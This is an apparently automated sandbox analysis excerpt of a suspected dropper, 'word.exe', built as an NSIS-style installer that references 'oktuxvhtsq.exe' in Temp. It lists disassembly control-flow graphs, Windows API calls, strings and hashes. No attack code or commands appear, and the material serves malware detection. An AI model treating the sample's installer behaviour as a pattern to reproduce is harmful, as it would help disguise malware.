                                  control_flow_graph 376 4054bd-4054d8 call 40576c 379 4054f1-4054fb 376->379 380 4054da-4054ec DeleteFileA 376->380 382 4054fd-4054ff 379->382 383 40550f-40551d call 405b98 379->383 381 405685-405688 380->381 384 405630-405636 382->384 385 405505-405509 382->385 391 40552c-40552d call 4056d2 383->391 392 40551f-40552a lstrcatA 383->392 384->381 387 405638-40563b 384->387 385->383 385->384 389 405645-40564d call 405e93 387->389 390 40563d-405643 387->390 389->381 400 40564f-405664 call 40568b call 405850 RemoveDirectoryA 389->400 390->381 393 405532-405535 391->393 392->393 396 405540-405546 lstrcatA 393->396 397 405537-40553e 393->397 399 40554b-405569 lstrlenA FindFirstFileA 396->399 397->396 397->399 401 405626-40562a 399->401 402 40556f-405586 call 4056b6 399->402 412 405666-40566a 400->412 413 40567d-405680 call 404e84 400->413 401->384 404 40562c 401->404 410 405591-405594 402->410 411 405588-40558c 402->411 404->384 415 405596-40559b 410->415 416 4055a7-4055b5 call 405b98 410->416 411->410 414 40558e 411->414 412->390 418 40566c-40567b call 404e84 call 4058e6 412->418 413->381 414->410 420 405605-405617 FindNextFileA 415->420 421 40559d-40559f 415->421 426 4055b7-4055bf 416->426 427 4055cc-4055db call 405850 DeleteFileA 416->427 418->381 420->402 424 40561d-405620 FindClose 420->424 421->416 425 4055a1-4055a5 421->425 424->401 425->416 425->420 426->420 429 4055c1-4055ca call 4054bd 426->429 436 4055fd-405600 call 404e84 427->436 437 4055dd-4055e1 427->437 429->420 436->420 439 4055e3-4055f3 call 404e84 call 4058e6 437->439 440 4055f5-4055fb 437->440 439->420 440->420
                                  APIs
                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                  • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                  • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                  • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                  • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040560F
                                  • FindClose.KERNELBASE(?), ref: 00405620
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\*.*$C:\Users\user\AppData\Roaming\word.exe$\*.*
                                  • API String ID: 2035342205-1417842008
                                  • Opcode ID: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                  • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                  • Opcode Fuzzy Hash: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                  • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004061D4 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 593 4061d4-4061d9 594 40624a-406268 593->594 595 4061db-40620a 593->595 598 406840-406855 594->598 596 406211-406215 595->596 597 40620c-40620f 595->597 602 406217-40621b 596->602 603 40621d 596->603 601 406221-406224 597->601 599 406857-40686d 598->599 600 40686f-406885 598->600 604 406888-40688f 599->604 600->604 605 406242-406245 601->605 606 406226-40622f 601->606 602->601 603->601 607 406891-406895 604->607 608 4068b6-4068c2 604->608 611 406417-406435 605->611 609 406231 606->609 610 406234-406240 606->610 612 406a44-406a4e 607->612 613 40689b-4068b3 607->613 622 406058-406061 608->622 609->610 617 4062aa-4062d8 610->617 614 406437-40644b 611->614 615 40644d-40645f 611->615 618 406a5a-406a6d 612->618 613->608 621 406462-40646c 614->621 615->621 619 4062f4-40630e 617->619 620 4062da-4062f2 617->620 623 406a72-406a76 618->623 624 406311-40631b 619->624 620->624 627 40646e 621->627 628 40640f-406415 621->628 625 406067 622->625 626 406a6f 622->626 630 406321 624->630 631 406292-406298 624->631 632 406113-406117 625->632 633 406183-406187 625->633 634 40606e-406072 625->634 635 4061ae-4061cf 625->635 626->623 636 4063ea-4063ee 627->636 637 40657f-40658c 627->637 628->611 629 4063b3-4063bd 628->629 638 406a02-406a0c 629->638 639 4063c3-4063e5 629->639 655 406277-40628f 630->655 656 4069de-4069e8 630->656 640 40634b-406351 631->640 641 40629e-4062a4 631->641 644 4069c3-4069cd 632->644 645 40611d-406136 632->645 648 4069d2-4069dc 633->648 649 40618d-4061a1 633->649 634->618 647 406078-406085 634->647 635->598 642 4063f4-40640c 636->642 643 4069f6-406a00 636->643 637->622 638->618 639->637 650 4063af 640->650 652 406353-406371 640->652 641->617 641->650 642->628 643->618 644->618 651 406139-40613d 645->651 647->626 653 40608b-4060d1 647->653 648->618 654 4061a4-4061ac 649->654 650->629 651->632 657 40613f-406145 651->657 658 406373-406387 652->658 659 406389-40639b 652->659 660 4060d3-4060d7 653->660 661 4060f9-4060fb 653->661 654->633 654->635 655->631 656->618 664 406147-40614e 657->664 665 40616f-406181 657->665 666 40639e-4063a8 658->666 659->666 667 4060e2-4060f0 GlobalAlloc 660->667 668 4060d9-4060dc GlobalFree 660->668 662 406109-406111 661->662 663 4060fd-406107 661->663 662->651 663->662 663->663 669 406150-406153 GlobalFree 664->669 670 406159-406169 GlobalAlloc 664->670 665->654 666->640 671 4063aa 666->671 667->626 672 4060f6 667->672 668->667 669->670 670->626 670->665 674 406330-406348 671->674 675 4069ea-4069f4 671->675 672->661 674->640 675->618
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                  • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                  • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                  • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405E93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 738 405e93-405ea7 FindFirstFileA 739 405eb4 738->739 740 405ea9-405eb2 FindClose 738->740 741 405eb6-405eb7 739->741 740->741
                                  APIs
                                  • FindFirstFileA.KERNELBASE(?,00422588,C:\,004057AF,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                  • FindClose.KERNEL32(00000000), ref: 00405EAA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: C:\
                                  • API String ID: 2295610775-3404278061
                                  • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                  • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                  • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                  • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403981 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 132 403981-403993 133 403ad4-403ae3 132->133 134 403999-40399f 132->134 135 403b32-403b47 133->135 136 403ae5-403b2d GetDlgItem * 2 call 403e54 SetClassLongA call 40140b 133->136 134->133 137 4039a5-4039ae 134->137 139 403b87-403b8c call 403ea0 135->139 140 403b49-403b4c 135->140 136->135 141 4039b0-4039bd SetWindowPos 137->141 142 4039c3-4039c6 137->142 154 403b91-403bac 139->154 146 403b4e-403b59 call 401389 140->146 147 403b7f-403b81 140->147 141->142 143 4039e0-4039e6 142->143 144 4039c8-4039da ShowWindow 142->144 149 403a02-403a05 143->149 150 4039e8-4039fd DestroyWindow 143->150 144->143 146->147 168 403b5b-403b7a SendMessageA 146->168 147->139 153 403e21 147->153 158 403a07-403a13 SetWindowLongA 149->158 159 403a18-403a1e 149->159 156 403dfe-403e04 150->156 155 403e23-403e2a 153->155 161 403bb5-403bbb 154->161 162 403bae-403bb0 call 40140b 154->162 156->153 169 403e06-403e0c 156->169 158->155 166 403ac1-403acf call 403ebb 159->166 167 403a24-403a35 GetDlgItem 159->167 164 403bc1-403bcc 161->164 165 403ddf-403df8 DestroyWindow EndDialog 161->165 162->161 164->165 171 403bd2-403c1f call 405bba call 403e54 * 3 GetDlgItem 164->171 165->156 166->155 172 403a54-403a57 167->172 173 403a37-403a4e SendMessageA IsWindowEnabled 167->173 168->155 169->153 170 403e0e-403e17 ShowWindow 169->170 170->153 202 403c21-403c26 171->202 203 403c29-403c65 ShowWindow EnableWindow call 403e76 EnableWindow 171->203 176 403a59-403a5a 172->176 177 403a5c-403a5f 172->177 173->153 173->172 180 403a8a-403a8f call 403e2d 176->180 181 403a61-403a67 177->181 182 403a6d-403a72 177->182 180->166 185 403aa8-403abb SendMessageA 181->185 186 403a69-403a6b 181->186 182->185 187 403a74-403a7a 182->187 185->166 186->180 188 403a91-403a9a call 40140b 187->188 189 403a7c-403a82 call 40140b 187->189 188->166 199 403a9c-403aa6 188->199 198 403a88 189->198 198->180 199->198 202->203 206 403c67-403c68 203->206 207 403c6a 203->207 208 403c6c-403c9a GetSystemMenu EnableMenuItem SendMessageA 206->208 207->208 209 403c9c-403cad SendMessageA 208->209 210 403caf 208->210 211 403cb5-403cee call 403e89 call 405b98 lstrlenA call 405bba SetWindowTextA call 401389 209->211 210->211 211->154 220 403cf4-403cf6 211->220 220->154 221 403cfc-403d00 220->221 222 403d02-403d08 221->222 223 403d1f-403d33 DestroyWindow 221->223 222->153 224 403d0e-403d14 222->224 223->156 225 403d39-403d66 CreateDialogParamA 223->225 224->154 226 403d1a 224->226 225->156 227 403d6c-403dc3 call 403e54 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 225->227 226->153 227->153 232 403dc5-403ddd ShowWindow call 403ea0 227->232 232->156
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                  • ShowWindow.USER32(?), ref: 004039DA
                                  • DestroyWindow.USER32 ref: 004039EE
                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A0A
                                  • GetDlgItem.USER32(?,?), ref: 00403A2B
                                  • SendMessageA.USER32 ref: 00403A3F
                                  • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                  • GetDlgItem.USER32(?,00000001), ref: 00403AF4
                                  • GetDlgItem.USER32(?,00000002), ref: 00403AFE
                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403B18
                                  • SendMessageA.USER32 ref: 00403B69
                                  • GetDlgItem.USER32(?,00000003), ref: 00403C0F
                                  • ShowWindow.USER32(00000000,?), ref: 00403C30
                                  • EnableWindow.USER32(?,?), ref: 00403C42
                                  • EnableWindow.USER32(?,?), ref: 00403C5D
                                  • GetSystemMenu.USER32 ref: 00403C73
                                  • EnableMenuItem.USER32 ref: 00403C7A
                                  • SendMessageA.USER32 ref: 00403C92
                                  • SendMessageA.USER32 ref: 00403CA5
                                  • lstrlenA.KERNEL32(00420538,?,00420538,mrodzekle Setup), ref: 00403CCE
                                  • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                  • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                  • String ID: mrodzekle Setup
                                  • API String ID: 184305955-4007173231
                                  • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                  • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                  • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                  • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004035EB Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 235 4035eb-403603 call 405f28 238 403605-403615 call 405af6 235->238 239 403617-40363e call 405a7f 235->239 248 403661-40368a call 4038b4 call 40576c 238->248 244 403640-403651 call 405a7f 239->244 245 403656-40365c lstrcatA 239->245 244->245 245->248 253 403690-403695 248->253 254 403711-403719 call 40576c 248->254 253->254 255 403697-4036bb call 405a7f 253->255 260 403727-40374c LoadImageA 254->260 261 40371b-403722 call 405bba 254->261 255->254 262 4036bd-4036bf 255->262 264 403752-403788 RegisterClassA 260->264 265 4037db-4037e3 call 40140b 260->265 261->260 266 4036d0-4036dc lstrlenA 262->266 267 4036c1-4036ce call 4056b6 262->267 268 4038aa 264->268 269 40378e-4037d6 SystemParametersInfoA CreateWindowExA 264->269 279 4037e5-4037e8 265->279 280 4037ed-4037f8 call 4038b4 265->280 273 403704-40370c call 40568b call 405b98 266->273 274 4036de-4036ec lstrcmpiA 266->274 267->266 272 4038ac-4038b3 268->272 269->265 273->254 274->273 278 4036ee-4036f8 GetFileAttributesA 274->278 283 4036fa-4036fc 278->283 284 4036fe-4036ff call 4056d2 278->284 279->272 288 403881-403889 call 404f56 280->288 289 4037fe-403818 ShowWindow call 405eba 280->289 283->273 283->284 284->273 294 4038a3-4038a5 call 40140b 288->294 295 40388b-403891 288->295 296 403824-403836 GetClassInfoA 289->296 297 40381a-40381f call 405eba 289->297 294->268 295->279 298 403897-40389e call 40140b 295->298 301 403838-403848 GetClassInfoA RegisterClassA 296->301 302 40384e-403871 DialogBoxParamA call 40140b 296->302 297->296 298->279 301->302 306 403876-40387f call 40353b 302->306 306->272
                                  APIs
                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                  • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 0040365C
                                  • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                  • lstrcmpiA.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                  • GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ), ref: 004036EF
                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403738
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  • RegisterClassA.USER32 ref: 0040377F
                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                  • CreateWindowExA.USER32 ref: 004037D0
                                  • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                  • GetClassInfoA.USER32(00000000,RichEdit20A,004236E0), ref: 00403832
                                  • GetClassInfoA.USER32(00000000,RichEdit,004236E0), ref: 0040383F
                                  • RegisterClassA.USER32(004236E0), ref: 00403848
                                  • DialogBoxParamA.USER32 ref: 00403867
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$6B
                                  • API String ID: 1975747703-1136046952
                                  • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                  • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                  • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                  • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402C55 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 309 402c55-402ca3 GetTickCount GetModuleFileNameA call 40586f 312 402ca5-402caa 309->312 313 402caf-402cdd call 405b98 call 4056d2 call 405b98 GetFileSize 309->313 314 402e87-402e8b 312->314 321 402ce3 313->321 322 402dca-402dd8 call 402bf1 313->322 323 402ce8-402cff 321->323 329 402dda-402ddd 322->329 330 402e2d-402e32 322->330 325 402d01 323->325 326 402d03-402d05 call 403081 323->326 325->326 333 402d0a-402d0c 326->333 331 402e01-402e2b GlobalAlloc call 4030b3 call 402e8e 329->331 332 402ddf-402df0 call 4030b3 call 403081 329->332 330->314 331->330 360 402e3e-402e4f 331->360 349 402df5-402df7 332->349 335 402d12-402d19 333->335 336 402e34-402e3c call 402bf1 333->336 339 402d95-402d99 335->339 340 402d1b-402d2f call 405830 335->340 336->330 344 402da3-402da9 339->344 345 402d9b-402da2 call 402bf1 339->345 340->344 358 402d31-402d38 340->358 351 402db8-402dc2 344->351 352 402dab-402db5 call 405f97 344->352 345->344 349->330 355 402df9-402dff 349->355 351->323 359 402dc8 351->359 352->351 355->330 355->331 358->344 364 402d3a-402d41 358->364 359->322 361 402e51 360->361 362 402e57-402e5c 360->362 361->362 365 402e5d-402e63 362->365 364->344 366 402d43-402d4a 364->366 365->365 367 402e65-402e80 SetFilePointer call 405830 365->367 366->344 368 402d4c-402d53 366->368 371 402e85 367->371 368->344 370 402d55-402d75 368->370 370->330 372 402d7b-402d7f 370->372 371->314 373 402d81-402d85 372->373 374 402d87-402d8f 372->374 373->359 373->374 374->344 375 402d91-402d93 374->375 375->344
                                  APIs
                                  • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,?,00000000), ref: 00402C66
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000400), ref: 00402C82
                                    • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405873
                                    • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00402CCE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                  • API String ID: 4283519449-2207440701
                                  • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                  • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                  • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                  • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402E8E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 445 402e8e-402ea2 446 402ea4 445->446 447 402eab-402eb3 445->447 446->447 448 402eb5 447->448 449 402eba-402ebf 447->449 448->449 450 402ec1-402eca call 4030b3 449->450 451 402ecf-402edc call 403081 449->451 450->451 455 402ee2-402ee6 451->455 456 40302c 451->456 457 403015-403017 455->457 458 402eec-402f0c GetTickCount call 406005 455->458 459 40302e-40302f 456->459 460 403019-40301c 457->460 461 40306c-403070 457->461 469 403077 458->469 471 402f12-402f1a 458->471 463 40307a-40307e 459->463 466 403021-40302a call 403081 460->466 467 40301e 460->467 464 403031-403037 461->464 465 403072 461->465 472 403039 464->472 473 40303c-40304a call 403081 464->473 465->469 466->456 479 403074 466->479 467->466 469->463 476 402f1c 471->476 477 402f1f-402f2d call 403081 471->477 472->473 473->456 481 40304c-40305f WriteFile 473->481 476->477 477->456 483 402f33-402f3c 477->483 479->469 484 403011-403013 481->484 485 403061-403064 481->485 486 402f42-402f5f call 406025 483->486 484->459 485->484 487 403066-403069 485->487 490 402f65-402f7c GetTickCount 486->490 491 40300d-40300f 486->491 487->461 492 402fc1-402fc5 490->492 493 402f7e-402f86 490->493 491->459 496 403002-403005 492->496 497 402fc7-402fca 492->497 494 402f88-402f8c 493->494 495 402f8e-402fbe MulDiv wsprintfA call 404e84 493->495 494->492 494->495 495->492 496->471 498 40300b 496->498 500 402fea-402ff0 497->500 501 402fcc-402fde WriteFile 497->501 498->469 502 402ff6-402ffa 500->502 501->484 504 402fe0-402fe3 501->504 502->486 505 403000 502->505 504->484 506 402fe5-402fe8 504->506 505->469 506->502
                                  APIs
                                  • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EEC
